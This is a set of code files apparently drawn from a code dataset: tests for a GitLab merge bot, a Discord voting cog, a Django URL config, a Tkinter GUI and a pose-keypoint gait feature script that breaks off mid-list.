marge.single_merge_job\nimport marge.user\nfrom marge.gitlab import GET, PUT\nfrom marge.merge_request import MergeRequest\nfrom tests.gitlab_api_mock import Error, Ok, MockLab\n\n\ndef _commit(commit_id, status):\n return {\n 'id': commit_id,\n 'short_id': commit_id,\n 'author_name': 'J. 
Bond',\n 'author_email': 'jbond@mi6.gov.uk',\n 'message': 'Shaken, not stirred',\n 'status': status,\n }\n\n\ndef _branch(name, protected=False):\n return {\n 'name': name,\n 'protected': protected,\n }\n\n\ndef _pipeline(sha1, status, ref='useless_new_feature'):\n return {\n 'id': 47,\n 'status': status,\n 'ref': ref,\n 'sha': sha1,\n }\n\n\nclass SingleJobMockLab(MockLab):\n def __init__(self, gitlab_url=None, fork=False, merge_request_options=None):\n super().__init__(gitlab_url, fork=fork, merge_request_options=merge_request_options)\n api = self.api\n self.rewritten_sha = rewritten_sha = 'af7a'\n api.add_pipelines(\n self.merge_request_info['source_project_id'],\n _pipeline(sha1=rewritten_sha, status='running', ref=self.merge_request_info['source_branch']),\n from_state='pushed', to_state='passed',\n )\n api.add_pipelines(\n self.merge_request_info['source_project_id'],\n _pipeline(sha1=rewritten_sha, status='success', ref=self.merge_request_info['source_branch']),\n from_state=['passed', 'merged'],\n )\n source_project_id = self.merge_request_info['source_project_id']\n api.add_transition(\n GET(\n '/projects/{}/repository/branches/{}'.format(\n source_project_id, self.merge_request_info['source_branch'],\n ),\n ),\n Ok({'commit': _commit(commit_id=rewritten_sha, status='running')}),\n from_state='pushed',\n )\n api.add_transition(\n GET(\n '/projects/{}/repository/branches/{}'.format(\n source_project_id, self.merge_request_info['source_branch'],\n ),\n ),\n Ok({'commit': _commit(commit_id=rewritten_sha, status='success')}),\n from_state='passed'\n )\n api.add_transition(\n PUT(\n '/projects/1234/merge_requests/{iid}/merge'.format(iid=self.merge_request_info['iid']),\n dict(sha=rewritten_sha, should_remove_source_branch=True, merge_when_pipeline_succeeds=True),\n ),\n Ok({}),\n from_state=['passed', 'skipped'], to_state='merged',\n )\n api.add_merge_request(dict(self.merge_request_info, state='merged'), from_state='merged')\n api.add_transition(\n GET('/projects/1234/repository/branches/{}'.format(self.merge_request_info['target_branch'])),\n Ok({'commit': {'id': self.rewritten_sha}}),\n from_state='merged'\n )\n api.expected_note(\n self.merge_request_info,\n \"My job would be easier if people didn't jump the queue and push directly... *sigh*\",\n from_state=['pushed_but_master_moved', 'merge_rejected'],\n )\n api.expected_note(\n self.merge_request_info,\n \"I'm broken on the inside, please somebody fix me... 
:cry:\"\n )\n\n def push_updated(self, *unused_args, **unused_kwargs):\n self.api.state = 'pushed'\n updated_sha = 'deadbeef'\n return self.initial_master_sha, updated_sha, self.rewritten_sha\n\n @contextlib.contextmanager\n def expected_failure(self, message):\n author_assigned = False\n\n def assign_to_author():\n nonlocal author_assigned\n author_assigned = True\n\n self.api.add_transition(\n PUT(\n '/projects/1234/merge_requests/{iid}'.format(iid=self.merge_request_info['iid']),\n args={'assignee_id': self.author_id},\n ),\n assign_to_author,\n )\n error_note = \"I couldn't merge this branch: %s\" % message\n self.api.expected_note(self.merge_request_info, error_note)\n\n yield\n\n assert author_assigned\n assert error_note in self.api.notes\n\n @contextlib.contextmanager\n def branch_update(self, side_effect=None):\n if side_effect is None:\n side_effect = self.push_updated\n with patch.object(\n marge.single_merge_job.SingleMergeJob,\n 'update_from_target_branch_and_push',\n side_effect=side_effect,\n autospec=True,\n ):\n yield\n\n\nclass TestUpdateAndAccept(object):\n TestParams = namedtuple('TestParams', ['fork', 'source_project_id'])\n\n @pytest.fixture(\n params=[\n TestParams(fork=True, source_project_id=4321),\n TestParams(fork=False, source_project_id=1234),\n ]\n )\n def test_params(self, request):\n return request.param\n\n @pytest.fixture(autouse=True)\n def patch_sleep(self):\n with patch('time.sleep'):\n yield\n\n @pytest.fixture()\n def mocklab(self, test_params):\n return SingleJobMockLab(fork=test_params.fork)\n\n @pytest.fixture()\n def mocklab_factory(self, test_params):\n return partial(SingleJobMockLab, fork=test_params.fork)\n\n @pytest.fixture()\n def api(self, mocklab):\n return mocklab.api\n\n def make_job(self, api, mocklab, options=None):\n project_id = mocklab.project_info['id']\n merge_request_iid = mocklab.merge_request_info['iid']\n\n project = marge.project.Project.fetch_by_id(project_id, api)\n merge_request = MergeRequest.fetch_by_iid(project_id, merge_request_iid, api)\n\n repo = create_autospec(marge.git.Repo, spec_set=True)\n options = options or marge.job.MergeJobOptions.default()\n user = marge.user.User.myself(api)\n return marge.single_merge_job.SingleMergeJob(\n api=api, user=user,\n project=project, merge_request=merge_request, repo=repo,\n options=options,\n )\n\n def test_succeeds_first_time(self, api, mocklab):\n with mocklab.branch_update():\n job = self.make_job(\n api,\n mocklab,\n options=marge.job.MergeJobOptions.default(add_tested=True, add_reviewers=False),\n )\n job.execute()\n\n assert api.state == 'merged'\n assert api.notes == []\n\n def test_succeeds_with_updated_branch(self, api, mocklab):\n api.add_transition(\n GET(\n '/projects/1234/repository/branches/{source}'.format(\n source=mocklab.merge_request_info['source_branch'],\n ),\n ),\n Ok({'commit': {'id': mocklab.rewritten_sha}}),\n from_state='initial', to_state='pushed',\n )\n with patch.object(\n marge.single_merge_job.SingleMergeJob,\n 'add_trailers',\n side_effect=lambda *_: mocklab.push_updated()[2],\n autospec=True,\n ):\n job = self.make_job(\n api,\n mocklab,\n options=marge.job.MergeJobOptions.default(add_tested=True, add_reviewers=False),\n )\n job.execute()\n\n assert api.state == 'merged'\n assert api.notes == []\n\n def test_succeeds_if_skipped(self, api, mocklab):\n api.add_pipelines(\n mocklab.merge_request_info['source_project_id'],\n _pipeline(sha1=mocklab.rewritten_sha, status='running'),\n from_state='pushed', to_state='skipped',\n )\n 
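# Note on the mock-API convention used in these tests: each add_pipelines call\n        # registers a canned response keyed to the mock's state machine. The transition\n        # above moves the state from 'pushed' to 'skipped' while reporting a running\n        # pipeline, and the call below keeps serving a 'skipped' pipeline for the\n        # 'skipped'/'merged' states.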
api.add_pipelines(\n mocklab.merge_request_info['source_project_id'],\n _pipeline(sha1=mocklab.rewritten_sha, status='skipped'),\n from_state=['skipped', 'merged'],\n )\n\n with mocklab.branch_update():\n job = self.make_job(\n api,\n mocklab,\n options=marge.job.MergeJobOptions.default(add_tested=True, add_reviewers=False),\n )\n job.execute()\n\n assert api.state == 'merged'\n assert api.notes == []\n\n def test_succeeds_if_source_is_master(self, mocklab_factory):\n mocklab = mocklab_factory(\n merge_request_options={'source_branch': 'master', 'target_branch': 'production'},\n )\n api = mocklab.api\n api.add_transition(\n GET(\n '/projects/1234/repository/branches/{source}'.format(\n source=mocklab.merge_request_info['source_branch'],\n ),\n ),\n Ok({'commit': {'id': mocklab.rewritten_sha}}),\n from_state='initial', to_state='pushed',\n )\n with patch.object(\n marge.single_merge_job.SingleMergeJob,\n 'add_trailers',\n side_effect=lambda *_: mocklab.push_updated()[2],\n autospec=True,\n ):\n job = self.make_job(\n api,\n mocklab,\n options=marge.job.MergeJobOptions.default(add_tested=True, add_reviewers=False),\n )\n job.execute()\n\n assert api.state == 'merged'\n assert api.notes == []\n\n def test_fails_if_ci_fails(self, api, mocklab):\n api.add_pipelines(\n mocklab.merge_request_info['source_project_id'],\n _pipeline(sha1=mocklab.rewritten_sha, status='running'),\n from_state='pushed', to_state='failed',\n )\n api.add_pipelines(\n mocklab.merge_request_info['source_project_id'],\n _pipeline(sha1=mocklab.rewritten_sha, status='failed'),\n from_state=['failed'],\n )\n\n with mocklab.branch_update():\n with mocklab.expected_failure(\"CI failed!\"):\n job = self.make_job(\n api,\n mocklab,\n options=marge.job.MergeJobOptions.default(),\n )\n job.execute()\n\n assert api.state == 'failed'\n\n def test_fails_if_ci_canceled(self, api, mocklab):\n api.add_pipelines(\n mocklab.merge_request_info['source_project_id'],\n _pipeline(sha1=mocklab.rewritten_sha, status='running'),\n from_state='pushed', to_state='canceled',\n )\n api.add_pipelines(\n mocklab.merge_request_info['source_project_id'],\n _pipeline(sha1=mocklab.rewritten_sha, status='canceled'),\n from_state=['canceled'],\n )\n\n with mocklab.branch_update():\n with mocklab.expected_failure(\"Someone canceled the CI.\"):\n job = self.make_job(\n api,\n mocklab,\n options=marge.job.MergeJobOptions.default(),\n )\n job.execute()\n\n assert api.state == 'canceled'\n\n def test_fails_on_not_acceptable_if_master_did_not_move(\n self, api, mocklab, test_params\n ):\n new_branch_head_sha = '99ba110035'\n api.add_transition(\n GET(\n '/projects/{source_project_id}/repository/branches/useless_new_feature'.format(\n source_project_id=test_params.source_project_id,\n ),\n ),\n Ok({'commit': _commit(commit_id=new_branch_head_sha, status='success')}),\n from_state='pushed', to_state='pushed_but_head_changed'\n )\n with mocklab.branch_update():\n with mocklab.expected_failure(\"Someone pushed to branch while we were trying to merge\"):\n job = self.make_job(\n api,\n mocklab,\n options=marge.job.MergeJobOptions.default(add_tested=True, add_reviewers=False),\n )\n job.execute()\n\n assert api.state == 'pushed_but_head_changed'\n assert api.notes == [\n \"I couldn't merge this branch: Someone pushed to branch while we were trying to merge\",\n ]\n\n def test_fails_if_branch_is_protected(\n self, api, mocklab, test_params\n ):\n api.add_transition(\n GET(\n '/projects/{source_project_id}/repository/branches/useless_new_feature'.format(\n 
source_project_id=test_params.source_project_id,\n ),\n ),\n Ok(_branch('useless_new_feature', protected=True)),\n from_state='initial', to_state='protected'\n )\n with mocklab.expected_failure(\"Sorry, I can't push rewritten changes to protected branches!\"):\n job = self.make_job(\n api,\n mocklab,\n options=marge.job.MergeJobOptions.default(add_tested=True, add_reviewers=False),\n )\n job.repo.push.side_effect = marge.git.GitError()\n job.execute()\n\n assert api.state == 'protected'\n\n def test_succeeds_second_time_if_master_moved(self, api, mocklab, test_params):\n moved_master_sha = 'fafafa'\n first_rewritten_sha = '1o1'\n api.add_pipelines(\n mocklab.merge_request_info['source_project_id'],\n _pipeline(sha1=first_rewritten_sha, status='success'),\n from_state=['pushed_but_master_moved', 'merged_rejected'],\n )\n api.add_transition(\n PUT(\n '/projects/1234/merge_requests/{iid}/merge'.format(iid=mocklab.merge_request_info['iid']),\n dict(\n sha=first_rewritten_sha,\n should_remove_source_branch=True,\n merge_when_pipeline_succeeds=True,\n ),\n ),\n Error(marge.gitlab.NotAcceptable()),\n from_state='pushed_but_master_moved', to_state='merge_rejected',\n )\n api.add_transition(\n GET(\n '/projects/{source_project_id}/repository/branches/useless_new_feature'.format(\n source_project_id=test_params.source_project_id,\n ),\n ),\n Ok({'commit': _commit(commit_id=first_rewritten_sha, status='success')}),\n from_state='pushed_but_master_moved'\n )\n api.add_transition(\n GET('/projects/1234/repository/branches/master'),\n Ok({'commit': _commit(commit_id=moved_master_sha, status='success')}),\n from_state='merge_rejected'\n )\n\n def push_effects():\n assert api.state == 'initial'\n api.state = 'pushed_but_master_moved'\n yield mocklab.initial_master_sha, 'f00ba4', first_rewritten_sha\n\n assert api.state == 'merge_rejected'\n api.state = 'pushed'\n yield moved_master_sha, 'deadbeef', mocklab.rewritten_sha\n\n with mocklab.branch_update(side_effect=push_effects()):\n job = self.make_job(\n api,\n mocklab,\n options=marge.job.MergeJobOptions.default(add_tested=True, add_reviewers=False),\n )\n job.execute()\n\n assert api.state == 'merged'\n assert api.notes == [\n \"My job would be easier if people didn't jump the queue and push directly... 
*sigh*\",\n ]\n\n def test_handles_races_for_merging(self, api, mocklab):\n rewritten_sha = mocklab.rewritten_sha\n api.add_transition(\n PUT(\n '/projects/1234/merge_requests/{iid}/merge'.format(iid=mocklab.merge_request_info['iid']),\n dict(sha=rewritten_sha, should_remove_source_branch=True, merge_when_pipeline_succeeds=True),\n ),\n Error(marge.gitlab.NotFound(404, {'message': '404 Branch Not Found'})),\n from_state='passed', to_state='someone_else_merged',\n )\n api.add_merge_request(\n dict(mocklab.merge_request_info, state='merged'),\n from_state='someone_else_merged',\n )\n with mocklab.branch_update():\n job = self.make_job(api, mocklab)\n job.execute()\n assert api.state == 'someone_else_merged'\n assert api.notes == []\n\n def test_handles_request_becoming_wip_after_push(self, api, mocklab):\n rewritten_sha = mocklab.rewritten_sha\n api.add_transition(\n PUT(\n '/projects/1234/merge_requests/{iid}/merge'.format(iid=mocklab.merge_request_info['iid']),\n dict(sha=rewritten_sha, should_remove_source_branch=True, merge_when_pipeline_succeeds=True),\n ),\n Error(marge.gitlab.MethodNotAllowed(405, {'message': '405 Method Not Allowed'})),\n from_state='passed', to_state='now_is_wip',\n )\n api.add_merge_request(\n dict(mocklab.merge_request_info, work_in_progress=True),\n from_state='now_is_wip',\n )\n message = 'The request was marked as WIP as I was processing it (maybe a WIP commit?)'\n with mocklab.branch_update(), mocklab.expected_failure(message):\n job = self.make_job(api, mocklab)\n job.execute()\n assert api.state == 'now_is_wip'\n assert api.notes == [\"I couldn't merge this branch: %s\" % message]\n\n def test_guesses_git_hook_error_on_merge_refusal(self, api, mocklab):\n rewritten_sha = mocklab.rewritten_sha\n api.add_transition(\n PUT(\n '/projects/1234/merge_requests/{iid}/merge'.format(iid=mocklab.merge_request_info['iid']),\n dict(sha=rewritten_sha, should_remove_source_branch=True, merge_when_pipeline_succeeds=True),\n ),\n Error(marge.gitlab.MethodNotAllowed(405, {'message': '405 Method Not Allowed'})),\n from_state='passed', to_state='rejected_by_git_hook',\n )\n api.add_merge_request(\n dict(mocklab.merge_request_info, state='reopened'),\n from_state='rejected_by_git_hook',\n )\n message = (\n 'GitLab refused to merge this branch. 
I suspect that a Push Rule or a git-hook '\n 'is rejecting my commits; maybe my email needs to be white-listed?'\n )\n with mocklab.branch_update(), mocklab.expected_failure(message):\n job = self.make_job(api, mocklab)\n job.execute()\n assert api.state == 'rejected_by_git_hook'\n assert api.notes == [\"I couldn't merge this branch: %s\" % message]\n\n def test_discovers_if_someone_closed_the_merge_request(self, api, mocklab):\n rewritten_sha = mocklab.rewritten_sha\n api.add_transition(\n PUT(\n '/projects/1234/merge_requests/{iid}/merge'.format(iid=mocklab.merge_request_info['iid']),\n dict(sha=rewritten_sha, should_remove_source_branch=True, merge_when_pipeline_succeeds=True),\n ),\n Error(marge.gitlab.MethodNotAllowed(405, {'message': '405 Method Not Allowed'})),\n from_state='passed', to_state='oops_someone_closed_it',\n )\n api.add_merge_request(\n dict(mocklab.merge_request_info, state='closed'),\n from_state='oops_someone_closed_it',\n )\n message = 'Someone closed the merge request while I was attempting to merge it.'\n with mocklab.branch_update(), mocklab.expected_failure(message):\n job = self.make_job(api, mocklab)\n job.execute()\n assert api.state == 'oops_someone_closed_it'\n assert api.notes == [\"I couldn't merge this branch: %s\" % message]\n\n def test_tells_explicitly_that_gitlab_refused_to_merge(self, api, mocklab):\n rewritten_sha = mocklab.rewritten_sha\n api.add_transition(\n PUT(\n '/projects/1234/merge_requests/{iid}/merge'.format(iid=mocklab.merge_request_info['iid']),\n dict(sha=rewritten_sha, should_remove_source_branch=True, merge_when_pipeline_succeeds=True),\n ),\n Error(marge.gitlab.MethodNotAllowed(405, {'message': '405 Method Not Allowed'})),\n from_state='passed', to_state='rejected_for_mysterious_reasons',\n )\n message = \"Gitlab refused to merge this request and I don't know why!\"\n with mocklab.branch_update(), mocklab.expected_failure(message):\n job = self.make_job(api, mocklab)\n job.execute()\n assert api.state == 'rejected_for_mysterious_reasons'\n assert api.notes == [\"I couldn't merge this branch: %s\" % message]\n\n def test_wont_merge_wip_stuff(self, api, mocklab):\n wip_merge_request = dict(mocklab.merge_request_info, work_in_progress=True)\n api.add_merge_request(wip_merge_request, from_state='initial')\n\n with mocklab.expected_failure(\"Sorry, I can't merge requests marked as Work-In-Progress!\"):\n job = self.make_job(api, mocklab)\n job.execute()\n\n assert api.state == 'initial'\n assert api.notes == [\n \"I couldn't merge this branch: Sorry, I can't merge requests marked as Work-In-Progress!\",\n ]\n\n def test_wont_merge_branches_with_autosquash_if_rewriting(self, api, mocklab):\n autosquash_merge_request = dict(mocklab.merge_request_info, squash=True)\n api.add_merge_request(autosquash_merge_request, from_state='initial')\n admin_user = dict(mocklab.user_info, is_admin=True)\n api.add_user(admin_user, is_current=True)\n\n message = \"Sorry, merging requests marked as auto-squash would ruin my commit tagging!\"\n\n for rewriting_opt in ('add_tested', 'add_reviewers'):\n with mocklab.expected_failure(message):\n job = self.make_job(\n api,\n mocklab,\n options=marge.job.MergeJobOptions.default(**{rewriting_opt: True}),\n )\n job.execute()\n\n assert api.state == 'initial'\n\n with mocklab.branch_update():\n job = self.make_job(api, mocklab)\n job.execute()\n assert api.state == 'merged'\n\n @patch('marge.job.log', autospec=True)\n def test_waits_for_approvals(self, mock_log, api, mocklab):\n with mocklab.branch_update():\n job = 
self.make_job(\n api,\n mocklab,\n options=marge.job.MergeJobOptions.default(\n approval_timeout=timedelta(seconds=5), reapprove=True,\n ),\n )\n job.execute()\n\n mock_log.info.assert_any_call('Checking if approvals have reset')\n mock_log.debug.assert_any_call('Approvals haven\\'t reset yet, sleeping for %s secs', ANY)\n assert api.state == 'merged'\n\n def test_fails_if_changes_already_exist(self, api, mocklab):\n expected_message = 'these changes already exist in branch `{}`'.format(\n mocklab.merge_request_info['target_branch'],\n )\n with mocklab.expected_failure(expected_message):\n job = self.make_job(api, mocklab)\n job.repo.rebase.return_value = mocklab.initial_master_sha\n job.repo.get_commit_hash.return_value = mocklab.initial_master_sha\n job.execute()\n\n assert api.state == 'initial'\n assert api.notes == [\"I couldn't merge this branch: {}\".format(expected_message)]\n","sub_path":"tests/test_single_job.py","file_name":"test_single_job.py","file_ext":"py","file_size_in_byte":23555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"31094131","text":"# Copyright (c) 2021 War-Keeper\nimport os\nimport sys\n\nfrom discord.ext import commands\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nimport db\n# -----------------------------------------------------------\n# This File contains commands for voting on projects,\n# displaying which groups have signed up for which project\n# -----------------------------------------------------------\nclass Voting(commands.Cog):\n\n # -----------\n # initialize\n # -----------\n def __init__(self, bot):\n self.bot = bot\n\n # ----------------------------------------------------------------------------------------------------------\n # Function: vote(self, ctx, arg='Project', arg2='-1')\n # Description: \"votes\" for the given project by adding the user to it\n # Inputs:\n # - self: used to access parameters passed to the class through the constructor\n # - ctx: used to access the values passed through the current context\n # - arg: the name of the project\n # - arg2: the number of the project\n # Outputs: adds the user to the given project or returns an error if the project is invalid or the user\n # is not in a valid group\n # ----------------------------------------------------------------------------------------------------------\n @commands.command(name='vote', help='Used for voting for Project 2 and 3, \\\n To use the vote command, do: $vote \\'Project\\' \\n \\\n (For example: $vote project 0)', pass_context=True)\n async def vote(self, ctx, arg='Project', arg2='-1'):\n # get the arguments for the project to vote on\n project_num = int(arg2)\n\n # get the name of the caller\n member_name = ctx.message.author.display_name.upper()\n\n groups = db.query(\n 'SELECT group_num FROM group_members WHERE guild_id = %s AND member_name = %s LIMIT 1',\n (ctx.guild.id, member_name)\n )\n\n # error handle if member is not in a group\n if len(groups) == 0:\n await ctx.send(\"Could not find the Group you are in, please contact a TA or join with your group number\")\n raise commands.UserInputError\n\n num_groups = db.query(\n 'SELECT COUNT(*) FROM project_groups WHERE guild_id = %s AND project_num = %s',\n (ctx.guild.id, project_num)\n )[0]\n\n # check if project has more than 6 groups voting on it\n if num_groups == 6:\n await ctx.send('A Project cannot have more than 6 Groups working on it!')\n return\n\n member_group = groups[0]\n voted_for = db.query(\n 'SELECT 
project_num FROM project_groups WHERE guild_id = %s AND group_num = %s',\n (ctx.guild.id, member_group)\n )\n if voted_for:\n project_voted_for, *_ = voted_for[0]\n await ctx.send(f'You already voted for Project {project_voted_for}')\n return\n\n # add the group to the project list\n db.query(\n 'INSERT INTO project_groups (guild_id, project_num, group_num) VALUES (%s, %s, %s)',\n (ctx.guild.id, project_num, member_group)\n )\n await ctx.send(f'{member_group} has voted for Project {project_num}!')\n\n # this handles errors related to the vote command\n @vote.error\n async def vote_error(self, ctx, error):\n if isinstance(error, commands.UserInputError):\n await ctx.send('To join a group, use the join command, do: $vote \\'Project\\' \\n'\n '( For example: $vote Project 0 )')\n print(error)\n\n # ----------------------------------------------------------------------------------\n # Function: projects(self, ctx)\n # Description: prints the list of current projects\n # Inputs:\n # - self: used to access parameters passed to the class through the constructor\n # - ctx: used to access the values passed through the current context\n # Outputs: prints the list of current projects\n # ----------------------------------------------------------------------------------\n @commands.command(name='projects', help='print projects with groups assigned to them', pass_context=True)\n # @commands.dm_only()\n async def projects(self, ctx):\n projects = db.query(\n \"SELECT project_num, string_agg(group_num::text, ', ') AS group_members \"\n \"FROM project_groups WHERE guild_id = %s GROUP BY project_num\",\n (ctx.guild.id,)\n )\n\n await ctx.send(\n '\\n'.join(\n f'Project {project_num}: Group(s) {group_members}'\n for project_num, group_members in projects\n )\n )\n\n\n# -----------------------------------------------------------\n# add the file to the bot's cog system\n# -----------------------------------------------------------\ndef setup(bot):\n bot.add_cog(Voting(bot))\n","sub_path":"cogs/voting.py","file_name":"voting.py","file_ext":"py","file_size_in_byte":4902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"617118123","text":"from django.urls import path\r\nfrom .views import *\r\n\r\n\r\nurlpatterns = [\r\n\r\npath('', PostListView.as_view(), name='post_list'),\r\npath('create/', PostCreateView.as_view(), name='post_create'),\r\n# path('view/', CommmentListView.as_view(), name='view_comment'),\r\npath('/comment/', CommentCreateView.as_view(), name='comment_create'),\r\n\r\n]","sub_path":"post/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"33143566","text":"from tkinter import *\n\nclass GUI:\n def __init__(self, master):\n frame = Frame(master)\n frame.pack()\n frame.configure(background='white')\n self.button1 = Button(frame, bg=\"white\")\n self.button1.config(image=photo1)\n self.button2 = Button(frame,bg=\"white\")\n self.button2.config(image=photo2)\n self.button3 = Button(frame,bg=\"white\")\n self.button3.config(image=photo3)\n self.button4 = Button(frame, bg=\"white\")\n self.button4.config(image=photo4)\n self.button1.grid(row=0,column=0)\n self.button2.grid(row=0, column=1)\n self.button3.grid(row=1, column=0)\n self.button4.grid(row=1, column=1)\n\nroot= Tk()\n#photo = PhotoImage(file=\"C:/Users/Reemy/Documents/GitHub/std_googleAssistant/GUI/Icons/Home.png\")\n#label = Label(root,image=photo)\nlabel_1 = 
Label(root, text=\"Choose Your Fellow\", bg=\"white\", font=(\"Agency FB\", 25))\nlabel_1.pack(side=\"top\", anchor=N)\nphotoB = PhotoImage(file=\"C:/Users/Reemy/Documents/GitHub/std_googleAssistant/GUI/Icons/Back.png\")\nphotoE = PhotoImage(file=\"C:/Users/Reemy/Documents/GitHub/std_googleAssistant/GUI/Icons/Exit.png\")\nback = Button(root, bg=\"white\")\nback.config(image=photoB)\nquitButton = Button(root, command=root.quit, bg=\"white\")\nquitButton.config(image=photoE)\nback.pack(side=\"left\",anchor=NW)\nquitButton.pack(side=\"right\", anchor=NE)\n#label.pack(side=\"top\", anchor=N)\nphoto1 = PhotoImage(file=\"C:/Users/Reemy/Documents/GitHub/std_googleAssistant/GUI/Icons/Robo.png\")\nphoto2 = PhotoImage(file=\"C:/Users/Reemy/Documents/GitHub/std_googleAssistant/GUI/Icons/Kuro.png\")\nphoto3 = PhotoImage(file=\"C:/Users/Reemy/Documents/GitHub/std_googleAssistant/GUI/Icons/BabyG.png\")\nphoto4 = PhotoImage(file=\"C:/Users/Reemy/Documents/GitHub/std_googleAssistant/GUI/Icons/Johnny.png\")\nb= GUI(root)\nroot.geometry(\"1000x920\")\nroot.title(\"Intelligent Fellow\")\nroot.configure(background='white')\nroot.mainloop()","sub_path":"GUI/AmnaCodes/Characters.py","file_name":"Characters.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"629049571","text":"\"\"\"\nAuthor: Md Mahedi Hasan\nDescription: Preprocess pose keypoints to find more gait features\nSteps to do\n 1. find each body joint coordinates\n 2. find limb length\n 3. find motion features\n\npose keypoints got 25 points (total = 75 elements, 25x3 (x, y and accuracy))\nbody join point = {\nNeck(1), \nRShoulder(2), RElbow(3), RWrist(4),\nLShoulder(5), LElbow(6), LWrist(7),\nMHip(8), \nRHip(9), RKnee(10), RAnkle(11), RHeel(24), RBigToe(22), RSmallToe(23)\nLHip(12), LKnee(13), LAnkle(14), LHeel(21), LBigToe(19), LSmallToe(20), \nNose(0),\nREye(15), LEye(16), \nREar(17), LEar(18), \nBack(25)}\n\"\"\"\n\nimport numpy as np\nimport math\n\n# nose\nx_cor_nose = (0 * 3); y_cor_nose = (x_cor_nose + 1)\n\n# neck\nx_cor_neck = (1 * 3); y_cor_neck = (x_cor_neck + 1)\n\n# hip\nx_cor_r_hip = (9 * 3); y_cor_r_hip = (x_cor_r_hip + 1)\nx_cor_mid_hip = (8 * 3); y_cor_mid_hip = (x_cor_mid_hip + 1)\nx_cor_l_hip = (12 * 3); y_cor_l_hip = (x_cor_l_hip + 1)\n\n# knee\nx_cor_r_knee = (10 * 3); y_cor_r_knee = (x_cor_r_knee + 1)\nx_cor_l_knee = (13 * 3); y_cor_l_knee = (x_cor_l_knee + 1)\n\n# ankle\nx_cor_r_ankle = (11 * 3); y_cor_r_ankle = (x_cor_r_ankle + 1)\nx_cor_l_ankle = (14 * 3); y_cor_l_ankle = (x_cor_l_ankle + 1)\n\n# BigToe\nx_cor_r_btoe = (22 * 3); y_cor_r_btoe = (x_cor_r_btoe + 1)\nx_cor_l_btoe = (19 * 3); y_cor_l_btoe = (x_cor_l_btoe + 1)\n\n# Wrist\nx_cor_r_wrist = (4 * 3); y_cor_r_wrist = (x_cor_r_wrist + 1)\nx_cor_l_wrist = (7 * 3); y_cor_l_wrist = (x_cor_l_wrist + 1)\n\n# Elbow\nx_cor_r_elbow = (3 * 3); y_cor_r_elbow = (x_cor_r_elbow + 1)\nx_cor_l_elbow = (6 * 3); y_cor_l_elbow = (x_cor_l_elbow + 1)\n\n# Shoulder\nx_cor_r_shoulder = (2 * 3); y_cor_r_shoulder = (x_cor_r_shoulder + 1)\nx_cor_l_shoulder = (5 * 3); y_cor_l_shoulder = (x_cor_l_shoulder + 1)\n\n\n\n#Trick to find partial body\ndef is_partial_body(body_kps):\n partial_body = False\n\n right_leg = body_kps[y_cor_r_ankle] - body_kps[y_cor_r_hip]\n left_leg = body_kps[y_cor_l_ankle] - body_kps[y_cor_l_hip]\n\n # for partial body pose\n # print(\"right leg: \", right_leg); print(\"left leg: \", left_leg)\n if(right_leg <= 0 or left_leg <= 0): partial_body = True\n return 
partial_body\n\n\n\n# normalize body keypoints according to PTSN paper \ndef normalize_keypoints(body_kps):\n\n body_joint = [9, 10, 11, 12, 13, 14, 21, 24, 2, 5] \n frame_kps = []\n \n # calculating distance between right_ankle and center of the hip\n unit_length = body_kps[y_cor_mid_hip] - body_kps[y_cor_neck]\n \n # for complete body pose select joints\n for b_j in body_joint:\n x_cor = b_j * 3\n y_cor = x_cor + 1\n \n # subtract join from the neck\n norm_x = (body_kps[x_cor] - body_kps[x_cor_neck]) \n norm_y = (body_kps[y_cor] - body_kps[y_cor_neck]) \n\n # without normalize\n #frame_kps.append(norm_x)\n #frame_kps.append(norm_y)\n\n # normalize\n frame_kps.append(norm_x / unit_length)\n frame_kps.append(norm_y / unit_length)\n\n return frame_kps\n\n\ndef get_distance(bkps, x1, y1, x2, y2):\n dist = np.sqrt((bkps[x1] - bkps[x2]) ** 2 + (bkps[y1] - bkps[y2]) ** 2)\n return dist\n\n\ndef get_body_limb(bkps):\n\n # feet\n r_feet = get_distance(bkps, x_cor_r_ankle, y_cor_r_ankle, \n x_cor_r_btoe, y_cor_r_btoe)\n\n l_feet = get_distance(bkps, x_cor_l_ankle, y_cor_l_ankle, \n x_cor_l_btoe, y_cor_l_btoe)\n\n # foot\n r_foot = get_distance(bkps, x_cor_r_ankle, y_cor_r_ankle, \n x_cor_r_knee, y_cor_r_knee)\n\n\n l_foot = get_distance(bkps, x_cor_l_ankle, y_cor_l_ankle, \n x_cor_l_knee, y_cor_l_knee)\n\n # run\n r_run = get_distance(bkps, x_cor_r_knee, y_cor_r_knee, \n x_cor_r_hip, y_cor_r_hip)\n\n l_run = get_distance(bkps, x_cor_l_knee, y_cor_l_knee, \n x_cor_l_hip, y_cor_l_hip)\n\n # body\n r_body = get_distance(bkps, x_cor_r_hip, y_cor_r_hip, \n x_cor_neck, y_cor_neck)\n\n l_body = get_distance(bkps, x_cor_l_hip, y_cor_l_hip, \n x_cor_neck, y_cor_neck)\n\n\n # hand\n r_hand = get_distance(bkps, x_cor_r_wrist, y_cor_r_wrist, \n x_cor_r_elbow, y_cor_r_elbow)\n\n l_hand = get_distance(bkps, x_cor_l_wrist, y_cor_l_wrist, \n x_cor_l_elbow, y_cor_l_elbow)\n\n # arm\n r_arm = get_distance(bkps, x_cor_r_elbow, y_cor_r_elbow, \n x_cor_r_shoulder, y_cor_r_shoulder)\n\n l_arm = get_distance(bkps, x_cor_l_elbow, y_cor_l_elbow, \n x_cor_l_shoulder, y_cor_l_shoulder)\n\n\n nose_to_neck = get_distance(bkps, x_cor_neck, y_cor_neck, \n x_cor_nose, y_cor_nose)\n\n hip = get_distance(bkps, x_cor_r_hip, y_cor_r_hip,\n x_cor_l_hip, y_cor_l_hip)\n\n l_shoulder = get_distance(bkps, x_cor_neck, y_cor_neck, \n x_cor_l_shoulder, y_cor_l_shoulder)\n\n r_shoulder = get_distance(bkps, x_cor_neck, y_cor_neck, \n x_cor_r_shoulder, y_cor_r_shoulder)\n\n pose_limb = [r_foot, l_foot,\n r_run, l_run, r_body, l_body,\n r_hand, l_hand, r_arm, l_arm,\n 